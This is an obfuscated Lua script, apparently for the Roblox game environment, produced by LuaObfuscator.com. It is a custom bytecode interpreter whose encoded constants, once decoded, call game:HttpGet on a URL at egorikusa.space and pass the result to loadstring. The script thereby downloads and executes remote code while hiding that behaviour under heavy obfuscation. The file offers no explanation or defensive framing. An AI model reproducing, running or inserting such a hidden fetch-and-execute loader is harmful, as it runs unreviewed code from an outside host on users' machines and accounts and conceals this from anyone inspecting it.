--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33) if v33 then local v82=0 -0 ;local v83;while true do if (v82==((1637 -(1523 + 114)) -0)) then v83=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 58 + 6))^(((v33-(932 -(857 + (105 -31)))) -(v32-1)) + ((1634 -(68 + 997)) -(367 + 201)))) ;return v83-(v83%(928 -(214 + 713))) ;end end else local v84=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (878 -(282 + 595))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24() local v34,v35,v36,v37=v1(v16,v19,v19 + (1273 -(226 + 1044)) );v19=v19 + (17 -13) ;return (v37 * (16777333 -(32 + 85))) + (v36 * (64226 + 1310)) + (v35 * ((1014 -(892 + 65)) + (474 -275))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29() local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (0~=v38) then else v39=0;v40=nil;v38=689 -(198 + 490) ;end if (v38~=(13 -10)) then else v45=nil;while true do local v91=0 -0 ;while true do if (v91==1) then if (v39==0) then local v99=0;while true do if (v99==2) then v39=1207 -(696 + 510) ;break;end if (v99~=(1 -0)) then else v42={};v43={v40,v41,nil,v42};v99=2;end if (v99~=(0 -0)) then else v40={};v41={};v99=1;end end end break;end if (v91~=0) then else if (v39==1) then local v100=0;local v101;while true do if (v100==0) then v101=0;while true do if (v101==(3 -2)) then local v145=0;while true do if (v145==(374 -(123 + 251))) then for v148=1,v44 do local v149=0 -0 ;local v150;local v151;local v152;local v153;while true do if (v149==0) then local v155=698 -(208 + 490) ;while true do if (1~=v155) then else v149=1 + 0 ;break;end if (v155==0) then v150=0 + 0 ;v151=nil;v155=837 -(660 + 176) ;end end end if (1==v149) then local v156=0;while true do if (v156==(0 + 0)) then v152=nil;v153=nil;v156=203 -(14 + 188) ;end if (v156==1) then v149=677 -(534 + 141) ;break;end end end if (v149==(1 + 1)) then while true do if (v150==(0 + 0)) then local v163=0;while true do if (v163~=(1 + 0)) then else v150=1;break;end if (v163==(0 -0)) then local v164=0 -0 ;while true do if (v164==(2 -1)) then v163=1;break;end if (v164==(0 + 0)) then v151=0;v152=nil;v164=1 + 0 ;end end end end end if (v150~=(397 -(115 + 281))) then else v153=nil;while true do if (v151==1) then if (v152==1) then v153=v22()~=(0 -0) ;elseif (v152==(2 + 0)) then v153=v25();elseif (v152==(7 -4)) then v153=v26();end v45[v148]=v153;break;end if (v151==(0 -0)) then local v166=0;local v167;while true do if (0==v166) then v167=867 -(550 + 317) ;while true do if (v167==(0 -0)) then local v175=0;while true do if ((0 -0)==v175) then v152=v22();v153=nil;v175=1;end if (v175==(2 -1)) then v167=1;break;end end end if (1==v167) then v151=1;break;end end break;end end end end break;end end break;end end end v43[288 -(134 + 151) ]=v22();v145=1666 -(970 + 695) ;end if (v145==1) then v101=2;break;end end end if (v101==(3 -1)) then v39=2;break;end if (v101==(1990 -(582 + 1408))) then local v146=0 -0 ;while true do if (v146~=(0 -0)) then else v44=v24();v45={};v146=3 -2 ;end if (v146~=(1825 -(1195 + 629))) then else v101=1 -0 ;break;end end end end break;end end end if (v39==2) then local v102=0;while true do if (v102~=(241 -(187 + 54))) then else for v138=781 -(162 + 618) ,v24() do local v139=0;local v140;local v141;local v142;while true do if (v139==(0 + 0)) then v140=0 + 0 ;v141=nil;v139=1 -0 ;end if (v139==(1 -0)) then v142=nil;while true do if (v140==0) then local v154=0;while true do if (v154==(0 + 0)) then local v157=1636 -(1373 + 263) ;while true do if (v157==(1001 -(451 + 549))) then v154=1;break;end if (v157==(0 + 0)) then v141=0 -0 ;v142=nil;v157=1 -0 ;end end end if (v154~=1) then else v140=1385 -(746 + 638) ;break;end end end if (v140==1) then while true do if ((0 + 0)==v141) then v142=v22();if (v21(v142,1 -0 ,1)~=0) then else local v158=341 -(218 + 123) ;local v159;local v160;local v161;local v162;while true do if (v158==(1583 -(1535 + 46))) then while true do if ((3 + 0)==v159) then if (v21(v161,3,3)==(1 + 0)) then v162[4]=v45[v162[564 -(306 + 254) ]];end v40[v138]=v162;break;end if (v159==1) then local v169=0;while true do if (v169==(1 + 0)) then v159=3 -1 ;break;end if (v169==0) then v162={v23(),v23(),nil,nil};if (v160==0) then local v176=0;local v177;local v178;while true do if (v176==(2 -1)) then while true do if ((603 -(268 + 335))==v177) then v178=0;while true do if (v178==(290 -(60 + 230))) then v162[3]=v23();v162[4]=v23();break;end end break;end end break;end if (v176==(572 -(426 + 146))) then v177=0;v178=nil;v176=1;end end elseif (v160==(1 + 0)) then v162[3]=v24();elseif (v160==(1458 -(282 + 1174))) then v162[3]=v24() -(2^(827 -(569 + 242))) ;elseif (v160~=3) then else local v182=0 -0 ;local v183;while true do if (v182==0) then v183=0 + 0 ;while true do if (v183~=0) then else v162[1027 -(706 + 318) ]=v24() -((1253 -(721 + 530))^(1287 -(945 + 326))) ;v162[4]=v23();break;end end break;end end end v169=2 -1 ;end end end if (v159~=2) then else local v170=0 + 0 ;local v171;while true do if (v170==0) then v171=700 -(271 + 429) ;while true do if (1==v171) then v159=3;break;end if (v171~=0) then else local v179=0 + 0 ;while true do if (v179~=0) then else if (v21(v161,1,1)~=1) then else v162[1502 -(1408 + 92) ]=v45[v162[2]];end if (v21(v161,1088 -(461 + 625) ,1290 -(993 + 295) )==1) then v162[1 + 2 ]=v45[v162[3]];end v179=1;end if (v179~=1) then else v171=1172 -(418 + 753) ;break;end end end end break;end end end if (v159==0) then local v172=0;while true do if (v172==(0 + 0)) then v160=v21(v142,1 + 1 ,3);v161=v21(v142,2 + 2 ,2 + 4 );v172=1;end if (v172~=1) then else v159=530 -(406 + 123) ;break;end end end end break;end if (v158==(1770 -(1749 + 20))) then v161=nil;v162=nil;v158=2;end if (v158==(0 + 0)) then v159=1322 -(1249 + 73) ;v160=nil;v158=1;end end end break;end end break;end end break;end end end for v143=1,v24() do v41[v143-1 ]=v29();end v102=1 + 0 ;end if (v102==(1146 -(466 + 679))) then return v43;end end end v91=2 -1 ;end end end break;end if (v38~=2) then else v43=nil;v44=nil;v38=8 -5 ;end if (v38~=1) then else v41=nil;v42=nil;v38=2;end end end v30=nil;v18=7;end if (v18==4) then function v25() local v46=v24();local v47=v24();local v48=1901 -(106 + 1794) ;local v49=(v21(v47,1 + 0 ,40 -20 ) * ((1 + 1)^(94 -62))) + v46 ;local v50=v21(v47,21,96 -(30 + 35) );local v51=((v21(v47,86 -(38 + 16) )==(115 -(4 + (1367 -(1043 + 214))))) and  -1) or (585 -(57 + 527)) ;if (v50==(1427 -(41 + 1386))) then if (v49==(103 -(17 + (324 -238)))) then return v51 * (0 + 0) ;else v50=1 -0 ;v48=0;end elseif (v50==(5927 -3880)) then return ((v49==(166 -(122 + 44))) and (v51 * (1/(0 -0)))) or (v51 * NaN) ;end return v8(v51,v50-(3393 -2370) ) * (v48 + (v49/(((1214 -(323 + 889)) + 0)^(8 + (118 -74))))) ;end v26=nil;function v26(v52) local v53;if  not v52 then local v85=580 -(361 + 219) ;while true do if (v85==0) then v52=v24();if (v52==(320 -(53 + 267))) then return "";end break;end end end v53=v3(v16,v19,(v19 + v52) -(1 + (982 -(18 + 964))) );v19=v19 + v52 ;local v54={};for v66=414 -(15 + 398) , #v53 do v54[v66]=v2(v1(v3(v53,v66,v66)));end return v6(v54);end v18=5;end if (v18==2) then function v22() local v55=(126 -(116 + 10)) + 0 ;local v56;while true do if (v55==(3 -2)) then return v56;end if (v55==0) then v56=v1(v16,v19,v19);v19=v19 + (851 -(20 + 62 + 768)) ;v55=1 + 0 ;end end end v23=nil;function v23() local v57,v58=v1(v16,v19,v19 + (740 -(542 + 196)) );v19=v19 + (3 -1) ;return (v58 * (75 + 181)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59) if (v1(v59,2)==79) then local v86=0;while true do if (v86==0) then v20=v0(v3(v59,1,1));return "";end end else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v59,16));if v20 then local v98=v5(v88,v20);v20=nil;return v98;else return v88;end break;end end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v89=0,v76 do if (v89>=v70) then v74[v89-v70 ]=v75[v89 + 1 ];else v78[v89]=v75[v89 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v90=0;while true do if (v90==0) then v80=v68[v72];v81=v80[1];v90=1;end if (v90==1) then if (v81<=3) then if (v81<=1) then if (v81==0) then v78[v80[2]]=v80[3];else local v105=v80[2];v78[v105]=v78[v105](v13(v78,v105 + 1 ,v73));end elseif (v81>2) then local v107=v80[2];local v108=v78[v80[3]];v78[v107 + 1 ]=v108;v78[v107]=v108[v80[4]];else v78[v80[2]]=v62[v80[3]];end elseif (v81<=5) then if (v81==4) then v78[v80[2]]();else do return;end end elseif (v81==6) then local v114;local v115,v116;local v117;local v118;v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v118=v80[2];v117=v78[v80[3]];v78[v118 + 1 ]=v117;v78[v118]=v117[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v118=v80[2];v115,v116=v71(v78[v118](v13(v78,v118 + 1 ,v80[3])));v73=(v116 + v118) -1 ;v114=0;for v132=v118,v73 do v114=v114 + 1 ;v78[v132]=v115[v114];end v72=v72 + 1 ;v80=v68[v72];v118=v80[2];v78[v118]=v78[v118](v13(v78,v118 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];do return;end else local v128=v80[2];local v129,v130=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v73=(v130 + v128) -1 ;local v131=0;for v135=v128,v73 do v131=v131 + 1 ;v78[v135]=v129[v131];end end v72=v72 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F65676F72696B7573612E73706163652F66643934373539612O36616536653766346436322O3965662E6C756100083O0012063O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
